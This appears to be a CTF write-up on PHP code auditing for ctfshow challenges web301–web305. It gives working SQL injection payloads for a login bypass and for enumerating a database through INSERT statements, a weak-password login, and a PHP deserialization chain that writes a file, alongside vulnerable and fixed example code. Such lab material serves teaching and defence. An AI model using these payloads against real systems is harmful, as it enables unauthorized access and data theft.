How to audit php code

2025-01-31 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

In this issue the editor walks through how to conduct a PHP code audit, using the ctfshow challenges web301 to web305 as worked cases. The article is detailed and analyzes each case from a practitioner's point of view; I hope you can get something out of it.

Web301

Download address: https://ctfshow.lanzoui.com/ilMPgjfeyxa

I didn't get anything with Seay.

So I went straight to manual review.

checklogin.php:

It is obvious here that $username (taken from the userid parameter) goes into the query without any filtering, so there is a SQL injection. Because the submitted password is compared against whatever the query returns, a UNION can supply the value that the comparison will be made against.

Payload:

userid=1'union select 1#&userpwd=1

Login succeeds and returns the flag.
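As an added example (not the challenge's code, which the page only shows as screenshots), here is a login check with the shape the writeup describes for web301 and web302, run against an in-memory SQLite database, next to a prepared-statement version of the same check. The table and column names follow the writeup; sds_decode_standin() is an assumed md5 stand-in for the web302 transform sds_decode(), whose body is not on the page (web301 is the same check with no transform, so the injected literal is simply the password itself). SQLite needs `-- ` where MySQL accepts `#` as the trailing comment in the payload.

```php
<?php
// Added example (not the challenge's code). Models the login check the
// writeup describes: userid concatenated into the query, then the submitted
// password (after a transform) compared against whatever the query returned.
// sds_decode_standin() is an ASSUMED stand-in; the real sds_decode() is not
// shown on the page. Requires the pdo_sqlite extension.

function sds_decode_standin(string $pw): string {
    // Any deterministic transform will do for the attack: the attacker runs
    // it locally on a chosen password and injects the output, exactly as the
    // writeup does with the md5-looking value for web302.
    return md5($pw);
}

function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE sds_user (id INTEGER PRIMARY KEY, sds_username TEXT, sds_password TEXT)');
    // Constructed sample row; the attacker never needs to know this password.
    $ins = $db->prepare('INSERT INTO sds_user (sds_username, sds_password) VALUES (?, ?)');
    $ins->execute(['admin', sds_decode_standin('correct-horse-battery')]);
    return $db;
}

// Vulnerable shape (web302; web301 is the same without the transform).
function login_vulnerable(PDO $db, string $userid, string $userpwd): bool {
    $sql = "select sds_password from sds_user where sds_username='" . $userid . "' order by id limit 1;";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    if (!$row) {
        return false;
    }
    // The right-hand side came from the query, which the attacker controls.
    return strcasecmp(sds_decode_standin($userpwd), $row['sds_password']) === 0;
}

// Hardened: the userid is bound, so a UNION inside it is just a string to match.
function login_fixed(PDO $db, string $userid, string $userpwd): bool {
    $stmt = $db->prepare('select sds_password from sds_user where sds_username = ? order by id limit 1');
    $stmt->execute([$userid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if (!$row) {
        return false;
    }
    return hash_equals($row['sds_password'], sds_decode_standin($userpwd));
}

// Build the writeup's payload for a chosen password. MySQL accepts '#' as the
// trailing comment (as on the page); SQLite needs '-- '.
function union_payload(string $chosen_pw, string $comment = '-- '): string {
    return "1' union select '" . sds_decode_standin($chosen_pw) . "'" . $comment;
}

$db = make_db();
$chosen = '1';
$userid = union_payload($chosen);

var_dump(login_vulnerable($db, $userid, $chosen));   // injected userid, chosen password
var_dump(login_vulnerable($db, 'admin', 'guess'));   // ordinary wrong password
var_dump(login_fixed($db, $userid, $chosen));        // same payload against the bound query
var_dump(login_fixed($db, 'admin', 'correct-horse-battery'));
```

With the injected userid the vulnerable check accepts the password "1" although the stored password is something else, while the bound query treats the whole payload as a user name that does not exist. In real code the stored value should be password_hash() output checked with password_verify(); hash_equals() is used here only because the stand-in transform is a plain md5.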

Web302

The change from web301 is in the password comparison:

if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){

fun.php:

Run sds_decode locally on a test password (here "1"):

Construct payload:

userid=1'union select "d9c77c4e454869d5d8da3b4be79694d3"#&userpwd=1

Web303

Download address: https://ctfshow.lanzous.com/i6wtkjg1gxa

Seay audit:

There is still an injection in the login, but the user name is now length-limited, so it cannot be exploited there.

dptadd.php:

Every field is concatenated into an INSERT ... SET statement with no escaping:

$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";

dpt.php:

But both pages require being logged in.

A weak-password login attempt with admin/admin succeeded.

Data added through dptadd.php is displayed on dpt.php. So closing the sds_name quote, assigning a subquery to sds_address and commenting out the rest of the statement with # makes dpt.php print the subquery's result.

Construct payload:

dpt_name=1',sds_address=(select database())#    (returns sds)

dpt_name=1',sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#    (returns sds_dpt,sds_fl9g,sds_user)

dpt_name=1',sds_address=(select group_concat(column_name) from information_schema.columns where table_name="sds_fl9g")#    (returns flag)

dpt_name=1',sds_address=(select group_concat(flag) from sds_fl9g)#    (returns the flag)

Web304

A global WAF was added (regex reconstructed from the garbled extraction):

function sds_waf($str){return preg_match('/[0-9]|[a-z]|-/i',$str);}

But it can still be injected.

Payload:

dpt_name=1',sds_address=(select group_concat(flag) from sds_flaag)#

Web305

A much heavier WAF this time (regex reconstructed from the garbled extraction; it rejects practically every punctuation character, including the quote, parentheses and comma the web303/web304 payload depends on):

function sds_waf($str){if(preg_match('/\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\=|\{|\}|\[|\]|\;|\'|\"|\,|\.|\?|\/|\\\\|\//',$str)){return false;}else{return true;}}

But a new hole has been added: a deserialization chain that ends in a file write.

class.php:

It happens to include dao.php, and there is an unserialize() call.

Exp:

But dao.php is not directly included here.

Looking at service.php, it does include dao.php, and the service class has a method that calls through to dao:

public function clearCache(){$this->dao->clearCache();}

So the unserialize() reached through logout.php can be driven to the file-write sink in two ways:

Call the dao class through service.php to call its function

Call dao.php directly to call its function

In either case the chain also needs a config object, because $this->config->cache_dir reads the cache_dir variable defined in config.php.
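The object-injection mechanics behind that chain, as an added example that is not the challenge's code: the three classes below are stand-ins with only the shapes the writeup names (a service whose clearCache() calls $this->dao->clearCache(), a dao that reads $this->config->cache_dir, a config holding cache_dir). Their property names, the __destruct() trigger, and the marker file that clearCache() writes are assumptions made so the attack can be run locally; the writeup's second route (a dao object on its own) works the same way provided dao.php has its own trigger, which the page does not show.

```php
<?php
// Added example, not the challenge's files. The three classes are STAND-INS
// with the shapes the writeup names (service -> dao -> config->cache_dir and
// a clearCache() that touches the filesystem); their property names, the
// __destruct() trigger and the exact file written are assumptions made so
// the object-injection mechanics can be run locally.

class config {
    public $cache_dir = '/var/cache/sds';      // assumed: normally set in config.php
}

class dao {
    public $config;
    public function __construct() {
        $this->config = new config();
    }
    // Assumed sink: writes a marker file inside cache_dir. Every property of
    // an unserialized object is attacker-supplied, so $dir is too.
    public function clearCache(): string {
        $dir = rtrim($this->config->cache_dir, '/');
        if (!is_dir($dir)) {
            mkdir($dir, 0700, true);
        }
        $file = $dir . '/cleared.txt';
        file_put_contents($file, "cache cleared " . date('c') . "\n");
        return $file;
    }
}

class service {
    public $dao;
    public function __construct() {
        $this->dao = new dao();
    }
    public function clearCache() {       // shape quoted in the writeup
        return $this->dao->clearCache();
    }
    public function __destruct() {       // assumed trigger
        $this->clearCache();
    }
}

// Build the serialized chain by hand rather than with serialize(): creating
// real objects locally would fire the same __destruct() on the attacker's
// own machine, and the format is simple: O:<len>:"<class>":<n>:{<props>}
function build_chain(string $target_dir): string {
    $cfg = 'O:6:"config":1:{s:9:"cache_dir";s:' . strlen($target_dir) . ':"' . $target_dir . '";}';
    $dao = 'O:3:"dao":1:{s:6:"config";' . $cfg . '}';
    return 'O:7:"service":1:{s:3:"dao";' . $dao . '}';
}

// Stand-in for the unserialize() the writeup locates in logout.php. Returns
// the class PHP instantiated. With $safe, allowed_classes is off, so no
// real object (and therefore no __destruct) is ever created.
function logout_stub(string $data, bool $safe): string {
    $obj = $safe ? unserialize($data, ['allowed_classes' => false])
                 : unserialize($data);
    return get_class($obj);   // $obj is released on return: __destruct fires here for a real service
}

$target  = sys_get_temp_dir() . '/sds_demo_' . getmypid();
$marker  = $target . '/cleared.txt';
$payload = build_chain($target);

$cls = logout_stub($payload, false);
var_dump($cls, file_exists($marker));   // nobody called clearCache() explicitly
@unlink($marker);
@rmdir($target);

$cls = logout_stub($payload, true);     // __PHP_Incomplete_Class, nothing written
var_dump($cls, file_exists($marker));
```

The unsafe call instantiates a service object whose dao and config were both supplied by the attacker, so the file lands in the directory the attacker chose as soon as the object is released. The fix that does not depend on finding every gadget is to never unserialize attacker input into objects: pass ['allowed_classes' => false] (or switch the cookie/session format to JSON), and sign the data if it must round-trip through the client.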
